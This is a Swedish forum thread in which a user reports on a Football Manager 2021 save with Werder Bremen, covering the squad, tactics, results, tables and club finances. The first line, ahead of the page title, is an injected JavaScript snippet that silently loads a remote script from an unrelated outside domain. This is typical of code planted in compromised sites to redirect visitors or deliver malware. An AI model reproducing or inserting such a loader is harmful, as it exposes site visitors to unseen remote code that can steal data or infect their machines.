;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] – Werder Bremen – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] - Werder Bremen

7 Inlägg
2 Users
14 Reactions
641 Visningar
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

Förord:

Längesen jag verkligen djupdykte i detta fantastiska spel. De senaste åren har det varit en, två saves per årgång där orken till något större engagemang inte riktigt funnits. Därför köptes inte heller detta års spel förrän för någon vecka sedan. Nu, för att inte hamna i samma fälla som jag gjort tidigare, så är tanken att jag ska testa mig på en rapport. Något liknande har jag inte gjort på över 10 år, när jag tillsammans med den gamle forumiten Elton Gunn testade på en online-save mellan Birmingham och Aston Villa. Då hette det ”berättelse” dessutom och vi förde kommunikationen emellan oss på MSN. 

Så summa summarum så får ni ha ett visst överseende med vad som komma skall. Är dessutom allt annat än ett grafiskt underverk, vilket kommer göra att denna rapport kommer att se väldigt enkel ut. Men nu kör vi! Gissningsvis så lär resultaten inte vara att häpnas över, men jag hoppas att rapporten kan få en att fortsätta gnugga ändå. Och att innehållet gör den värd att följa. 


   
Daniel Nilsson and Micke reacted
Citera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

Laget som blir valt är Werder Bremen. Anledningen är enkel – jag hade en fantastisk save med samma lag för många år sedan. Får jag gissa så tänker jag att saven var på FM11, eller på en upplaga däromkring. Aaron Hunt, Marko Marin, Felix Kroos hette framtiden och Naldo, Torsten Frings, Per Mertesacker och Tim Wiese var våra nyckelspelare. Det är också just den sistnämnda nu som involverar sig igen, men inte då som spelare utan istället som tränare! Wrestling-arenan blev till slut inte tillräcklig för den nuförtiden väldigt muskulösa Tim Wiese. Hantlar och sprutor i bakändan byts ut mot tränarblock och visselpipa. Hur det kommer att gå för vår fine Tim? Det får vi se. Förväntningarna är inte skyhöga.

 

-----------

Truppen 2020/2021:

Truppen den här gången är annorlunda den som var vid min förra sejour hos klubben. Framtidens spelare i klubben har inte samma goda framtidsutsikter och nyckelspelarna idag är inte i närheten utav att vara av samma kvalité som då. Men då är då och nu är nu. Ska vi älta vad som varit kommer vi aldrig komma någonstans. Det är istället vad vi försöker se framför oss, klubbens finare dagar. Det är dit vi vill komma, det är det vi har som mål. Werder Bremen skall ut i Europa och göra sig till ett lag av värde i Tyskland igen. 2004 vann klubben den inhemska dubbeln och 2009 togs den senaste titeln i form av den inhemska cuptiteln. Samma år förlorade man UEFA-cup finalen efter förläning, mot Shakhtar Donetsk. Kan jag, Tim Wiese, med mina förmågor ta klubben dit? Som sagt, troligtvis inte. Men det hade ju varit förbannat roligt.

 

Målvakter:

01# Jiri Pavlenka
40# Luca Plogmann
22# Michael Zetterer

  • En helt okej uppsättning av målvakter. Pavlenka är den självklara förstaspaden, där han kvalitativt håller en bra nivå sett till övriga i Bundesliga. Plogmann därefter är en yngling som är någorlunda bra på fotboll redan och som med lite Wiese-tips möjligen kan ta sig en plats i något bottengäng i framtiden. Zetterer är det tredje alternativet och kommer förbli det också. Har varken kvalité idag eller imorgon.

Jiri Pavlenka

Mittbackar:

21# Ömer Toprak
18# Niklas Moisander
13# Milos Veljkovic
36# Christian Gross
29# Patrick Erras

  • Här har vi dessvärre somliga problem. Både till bredd och till viss del kvalité. Toprak och Veljkovic är två skickliga mittbackar, där Moisander därefter fortsatt håller en tillräcklig nivå. Men samtidigt har finnpajsaren hunnit blivit 34 år gammal. Där bakom har vi en Gross som både är gammal och på det inte särskilt bra på fotboll tillsammans med Erras som förvisso både är yngre och en aning bättre, men inte han heller särskilt förtroendegivande.

Ömer Toprak  Niklas Moisander  Milos Veljkovic

Ytterbackar:

05# Ludwig Augustinsson
32# Marco Friedl
23# Theodor Gebre Selassie
17# Felix Agu

  • Återigen en uppsättning av spelare som håller en nivå tillräcklig för att kunna göra den skillnad vi vill. Ludde är valet åt vänster, där unge Marco Friedl är ett gott komplement bakom. Friedl kan även spela centralt i backlinjen, vilket han troligtvis kommer att få göra en hel del under säsongen. Vilket kommer att kräva att Ludde både orkar spela mycket matcher samtidigt som han också behöver vara fri från skador. Åt höger kommer åldersmannen Gebre Selassie fortsatt att spela sin fotboll. Men där spännande Felix Agu förhoppningsvis tar steg under säsongen och inom kort kan ta vid platsen tjecken har förfogat över i snart 10 år.

 


Theodor Gebre Selassie                                     Ludwig Augustinsson

 

Centrala mittfältare:
34# Jean-Manuel Mbom
35# Maximilian Eggestein
43# Philipp Bargfrede
06# Kevin Möhwald

  • En lagdel som hänförs av Eggestein, lagets bäste spelare. En flexibel spelare som kan användas i flertalet roller och som kommer få dra ett enormt lass den här säsongen. Bredvid sig har vi tre spelare som alla håller en snarlik nivå, en nivå som är tillräcklig men samtidigt knappast mer än så. Längst strå drar nog Möhwald inledningsvis, då specifika egenskaper förhoppningsvis kommer till hands. Mbom har framtiden för sig och kan möjligtvis på sikt ta upp kampen på fullaste allvar. Den nu äldre Bargfrede – som varit i klubben sedan 2004 – kommer att främst värma bänken. Tidigare nämnda Erras finns också att tillgå ifall det skulle krisa.

Maximilian Eggestein  Kevin Möhwald

 

Offensiv central mittfältare:
20# Romano Schmid
10# Leonardo Bittencourt

  • Det största dilemma vi har här är att de två bästa spelarna på denna position återfinns på positionerna jag precis nämnde. Eggestein och Möhwald är båda spelare som under andra omständigheter hade varit alternativ som tia. Men nu är verkligheten en annan och därför står vi då med dessa två personligheter i Schmid och Bittencourt. Två helt okej alternativ trots allt. Schmid är ung och kan komma att bli en okej fotbollsspelare i framtiden. Bittencourt är mer etablerad, men trivs allra bäst åt vänster. En kantposition som inte finns och som inte kommer att finnas i Werder Bremen. Men den sistnämnda är den spelare som för tillfället är bäst av de två och som också kommer att få störst förtroende.

Leonardo Bittencourt

 

Anfallare:
07# Milot Rashica
08# Yuya Osako
11# Niclas Fullkrig
09# Davie Selke
19# Josh Sargent

  • Fem anfallare där alla håller en ungefärlig liknande nivå. Även om de skiljer sig en aning åt rent spelartypmässigt, vilket såklart är ett plus. Men känns lite väl lyxigt då dessutom ingen av dessa sitter på någon pojklön direkt, bortsett Sargent möjligen. Sargent som då istället är den jag hoppas allra bäst på, då han faktiskt har potentialen till att kunna skapa en rejäl avkastning till klubben. Selke är dessutom inlånad, där vi betalar hans fulla lön. Sannerligen ett mästerdrag från den sportsliga ledningen.

Milot Rashica  Yuya Osako

 

Summering av trupp:

Som tidigare nämnt så är det en rätt spretig trupp, med somliga höjder men också med ett par jobbiga dalar. Truppbredden är ett problem i stort och vi har ett par spelare som egentligen inte skall ha någonting i en klubb med ambitioner att göra. Samtidigt som det finns andra spelare som faktiskt kan göra skillnad och som också förtjänar att tillhöra en klubb som vill vara någonting annat än en klubb som huserar i bottenskiktet. Förra säsongen klarade sig klubben från nedflyttning med en(1) poäng. Där vill vi inte hamna igen.

Vi kommer att använda oss av en 3-4-1-2 formering. Där våra ytterbackar får ett stort ansvar i att skapa bredd i vårt anfallsspel. Tre mittbackar blir det för att det främst är en formering jag känner som både spännande och utmanande. Dessutom passar det truppen rätt väl. En tia eller sexa var länge en fundering, där jag inleder säsongen med just tian. Tycker jag trots allt har mer kvalité där än bland mina potentiella sexor. Kan kanske visa sig en aning naivt så småningom, när det visar sig att vi är rätt värdelösa kontra merparten av lagen i ligan. Men skam den som ger sig! Jag är dessutom tämligen usel på spelet att skapa defensivt lagda taktiker, vilket får mig att gå all in åt andra hållet istället, där det får bära eller brista. Eggestein finns dessutom att hitta bakom vår tia och där litar jag blint på att han dominerar sin position som defensiv spelfördelare och vattenbärare i ett.
Framåt får dagsläget och vilken spelartyp som passar bäst avgöra. Vi har som sagt ett gäng alternativ, där jag endast kommer att vara snäll mot Sargent. Övriga kommer att få sin chans, men tar de den inte så kommer jag att citera Arnold Schwarzenegger. Jag som Tim Wiese liknar inte bara honom, jag kommer att låta som honom också.

 

Jiri Pavlenka

Ömer Toprak  Niklas Moisander  Milos Veljkovic

Theodor Gebre Selassie                                     Ludwig Augustinsson

Maximilian Eggestein  Kevin Möhwald

Leonardo Bittencourt

Milot Rashica  Yuya Osako

This post was modified 3 år sedan by Onkel Fester

   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Spännande lagval! Ska bli intressant att följa denna 🙂

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

08/09-20            | DFB-Pokal  | Elversberg – Werder Bremen 1-2 ; 1-1 Osako, 1-2 Rashica

20/09-20            | Bundesliga | Werder Bremen – Herta Berlin 2-1 ;1-0 Rashica, 2-0 Moisander

15/09-20            | Bundesliga | Schalke 04 – Werder Bremen 2-0

03/10-20            | Bundesliga | Werder Bremen - Arminia Bielefeld 1-3 ; 1-3 Selke

17/10-20            | Bundesliga | Freiburg – Werder Bremen 0-1 ; 0-1 Eggestein

3 vinster, 0 oavgjorda, 2 förluster - 7 gjorda mål, 7 insläppta mål


En händelserik första tävlingsmånad. Har uppenbara problem att finna en fungerande taktik och spelmässigt har vi haft våra problem. Jag vill spela en mer positiv fotboll, men min oförmåga tillsammans med ett gäng rätt rassliga spelare gör den kombinationen allt annat än stark. Cupmatchen var en ensidig historia, men någonting som var väntat också i och med den låga kvalitén på motståndet. Första ligamatchen mot Herta gör vi en väldigt bra match, där vi vinner rättvist. Men där vi därefter gör två ordentliga plattmatcher mot Schalke 04 och Arminia Bielefeld, där vi istället förlorar med dunder och brak. Väl mot Freiburg lyckas vi studsa tillbaka i resultatväg, där vi vinner matchen med uddamålet på bortaplan. Men resultatet speglade inte matchbilden. Det var ett rån.

Jag börjar komma till insikt att jag trots allt måste spela både cyniskt och pragmatiskt för att få ut någonting vettigt av det här laget. Att försöka vara det kontrollerande laget med innehav och ett chansskapande genom ett eget spel är ingenting åtminstone jag får till, vilket har lett till att tankebanorna tvunget har förändrats. Nu får vi testa på att spela som rejäla underdogs, med låga block och ett riskminimerande för att därefter försöka straffa motståndarna på deras misstag. Väldigt rakt och väldigt konkret, inget utrymme för några kreativa lösningar. En riktig jävla brottarfotboll.. så får vi se var det leder.

Sett till de individuella prestationerna under dessa matcher så har framförallt vår målvakt Jiri Pavlenka varit bra. I synnerhet i matchen mot Freiburg, där han var en levande vägg. Därefter har mittbacken Veljkovic, mittfältsgeneralen Eggestein och anfallaren Rashica varit framträdande. Där övriga i laget alla kan bättre. Framförallt Augustinsson och prestigevärvningen inför säsongen Toprak har sina problem att prestera, vilket inte är optimalt då det är två nyckelspelare vi pratar om.

This post was modified 3 år sedan 3 times by Onkel Fester

   
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

25/10-20           | Bundesliga | Werder Bremen – Hoffenheim 0-0 ;

31/10-20           | Bundesliga | Eintracht Frankfurt – Werder Bremen 0-0 ;

07/11-20           | Bundesliga | Werder Bremen – Köln 2-0 ; 1-0 Fullkrig, 2-0 Moisander

21/11-20           | Bundesliga | Bayern Munchen – Werder Bremen 5-0 ;

27/11-20           | Bundesliga | Wolfsburg – Werder Bremen 1-3 ; 0-1 Schmid, 0-2 Rashica, 1-3 Rashica

2 vinster, 2 oavgjorda, 1 förlust – 5 gjorda mål, 6 insläppta mål

 

Placering, klubb, resultatrad, målskillnad, poäng

6:a Bayern Munchen                     4-2-3                  18-8                   14
7:a Werder Bremen                      4-2-3                  9-12                   14
8:a Mainz                                    4-1-4                  9-13                   13
………..
16:e Freiburg                                2-1-6                  9-15                   7

 


De taktiska förändringar som har gjorts har nog skapat Werder Bremen till ett av ligans absolut tråkigaste lag, men samtidigt så börjar också resultaten bli bättre. Både mot Hoffenheim och Frankfurt så har vi knappt haft bollen, men ändå lyckats kontra och skapat chanser nog för att göra mål och avgöra. Ett spelsätt som säkerligen är förbannat tråkigt att se på som Bremen-supporter, men som faller väl ut. Som faller allt mer väl ut ju fler matcher som spelas, ska också sägas.

Matchen mot Köln var ett styrkebesked. Vinsten var behövlig och att hålla nollan för fjärde matchen i rad var även det någonting att verkligen glädja sig åt. Vår defensiv var ramstark – trodde vi. Sen skulle vi till Munchen och spela fotboll och blev avklädda något så oerhört. Pavlenka räddade oss ifrån ett ännu större fiasko, vilket säger en hel del om matchbilden när resultat blev som det blev.
Nervös som jag var så trodde jag att det var proppen ur, för all negativ skit. Nu var det över. Nu skulle vi få smaka dåliga resultat, som i längden gav Tim en spark i baken. Jag var förbannat tveksam på lagets karaktär och än mer på min egen förmåga. Hade jag haft en klassisk liten bonnatur dessa matcher, där allting nu istället skulle fallera? Näst på tur var Wolfsburg, ett lag som förvisso hade börjat rätt dåligt. Med endast en vinst de första 8 matcherna. Men ändå var mitt tvivel stort. Men tji fick jag. Denna fina brottarfotboll studsade tillbaka med råge och gjorde processen kort. Att Wolfsburg både hade övertag i innehav och chansskapande spelade ingen roll, vi vann till slut övertygande. Resultatmässigt. Vilket trots allt är det som räknas.

 

Just resultatmässigt har det blåst positiva vindar. Vi ligger för närvarande på en plats ut till Europa. Självfallet någonting oerhört fint ifall det skulle inträffa, men fortsatt en utgång som känslan säger ligger rätt långt bort. Framöver stundar ett par tuffa matcher mot topptippat motstånd och serien är fortsatt väldigt jämn. Men någonting som inte ser särskilt positivt ut, varken nu eller på längre sikt, var ekonomin. Vi ligger med ett ständigt underskott månadsvis och fortsätter vi i den här takten så är vi snart nere på absoluta botten. Det finns ett gäng spelare i truppen med en rätt högt avkastningsvärde, men likväl så är det spelare jag helst av allt skulle vilja bygga framtiden på också. Finns redan nu ett stort intresse för flera nyckelspelare, däribland Eggestein, Rashica och målvakten Pavlenka. I värsta fall så vill det sig så illa att jag lär sälja en, eller kanske fler, av dessa herrar.  

 

Utgifter November:                     61,76mn kr
- Spelarlöner 32,02mn kr

Inkomster November:                 11,34mn kr
- Publikintäkter 4,64mn kr

 

Sammanlangd balans:                 -44,82mn kr

This post was modified 3 år sedan 2 times by Onkel Fester

   
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

Går det inte att använda tab här på forumet eller? Tabellen jag så fint skrev ser ju förjävlig ut på grund av det. 

This post was modified 3 år sedan by Onkel Fester

   
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
Topic starter  

 

05/12-20           | Bundesliga | Werder Bremen – Stuttgart 0-1;
12/12-20           | Bundesliga | RB Leipzig – Werder Bremen 1-1; 1-0 Fullkrig
15/12-20           | Bundesliga | Werder Bremen – Borussia Dortmund 2-2; 1-1 Möhwald, 2-1 Toprak
19/12-20           | Bundesliga | Mainz – Werder Bremen 0-1; 0-1 Rashica
22/12-20           | DBF Pokal  | Werder Bremen – Frankfurt 0-1
03/01-21           | Bundesliga | Werder Bremen – Union Berlin 2-0; 1-0 Möhwald, 2-0 Augustinsson
09/01-21           | Bundesliga | Bayer Leverkusen – Werder Bremen 4-0;
15/01-21           | Bundesliga | Werder Bremen – Augsburg 6-0; 1,2,3,4,5-0 Fullkrug, 6-0 Schmid
19/01-21           | Bundesliga | Borussia Mönchengladbach – Werder Bremen 3-0;
21/01-21           | Bundesliga | Herta Berlin – Werder Bremen 4-0;
29/01-21           | Bundesliga | Werder Bremen – Schalke 04 3-2; 1-0 Fullkrug, 2-0 Rashica, 3-2 Fullkurg

4 vinster, 2 oavgjorda, 5 förluster – 15 gjorda mål, 18 insläppta mål

 Placering, klubb, resultatrad, målskillnad, poäng

6:a Borussia Dortmund                8-6-5                  25-21                 30
7:a Werder Bremen                     8-4-7                  24-29                 28
8:a Köln                                     8-3-8                  26-28                 27
………..
16:e Schalke 04                          6-2-11                20-30                 20


Fick bli en rapport på ett antal fler matcher än innan. Det av anledningen att jag ska bli klar någon gång och att det inte ska bli så förbannat uttjatat för er.

 

Våra resultat är fortsatt upp och ner. Emellanåt presterar vi en väldigt bra fotboll och får med oss fina resultat, så som de båda kryssen mot RB Leipzig och Dortmund. Där vi kniper rättvist en poäng i bägge matcherna. Men därefter komma dessa fasansfulla plumpar, likt den mot Bayern Munchen tidigare och likt de mot Leverkusen, Herta och Mönchengladbach nu. Varför har jag inte riktigt kommit fram till ännu, men ett faktum är att när vi har problem så har vi ordentliga problem. Då stämmer väldigt lite och vi blir fullständigt utskåpade. Bara för att matchen efteråt helt plötsligt ha vaknat på rätt sida igen och göra bra ifrån oss, likt exempelvis matchen mot Augsburg där vi får en sanslös ketchupeffekt. Så mycket vi skapade den matchen är i jämförelse med det totala chansskapandet över hela säsongen hittills, nästan.

 

Men vi är fortfarande med i kampen om en plats till nästa säsong Europa League. Om vi är särskilt förtjänta av det sett till hur det ser ut när vi spelar, det vet jag inte. Men det är trots allt poängen som räknas. Likt oss så har flera andra lag oerhörda problem att visa någonting som kallas jämnhet och det kanske snarare är tjusningen med ligan än ett problem hos mig. De enda som radar upp stabila insatser egentligen är Bayern Munchen och Borussia Mönchengladbach, de lag som med marginal ligger etta och tvåa i serietabellen.

 

Lite smarrig lagstatistik för den intresserade:

Genomsnittligt bollinnehav           - (18/18) Werder Bremen, 41%
Vunna nickdueller                        - (1/18)  Werder Bremen, 433(58% vunna)
Antal gjorda mål                          - (9/18)  Werder Bremen, 24 mål
xG                                              - (15/18) Werder Bremen, 17,90
Antal insläppta mål                      - (12/18) Werder Bremen, 29
xAG                                            - (16/18) Werder Bremen, 30,48

Individuell statistik:

Skytteligan                                  - (3a) Fullkrug, 9 gjorda mål, (14e) Rashica, 5
Vunna tacklingar                          - (2a) Mbom, 85 vunna tacklingar, (8a) Eggestein, 57
Blockeringar                                - (1a) Augustinsson, 48 blockeringar, (6a) Mbom, 38, (10a) Eggestein, 35, (15e) Gebre Selassie, 29, Felix Agu 29
Rensningar                                  - (2a) Veljkovic, 254 rensningar, (10a) Toprak, 208, (11a) Moisander, 198,
Misstag ledda till mål                    - (1a) Niklas Moisander, 3 avgörande misstag gjorda
Antalet räddningar                       - (1a) Jiri Pavlenka, 96 antalet räddningar

Vad kan vi urskilja från denna statstik? Jo, att mina spelare följer mina taktiska distributioner på ett bra sätt. De har tagit till sig ordet brottarfotboll något så exemplariskt och vi är stolt ägare av Bundesligas absolut värsta fotboll. Ligga lågt, offra livet för att bollen inte ska in i mål och rensa bollfan framåt för att låta de tre längst fram försöka hitta någonting vettigt i offensiv väg. En rolig fotboll att spela? Ytterst tveksamt, men ingen har gnällt ännu.

 


   
Micke and Yayakolo reacted
SvaraCitera
Share: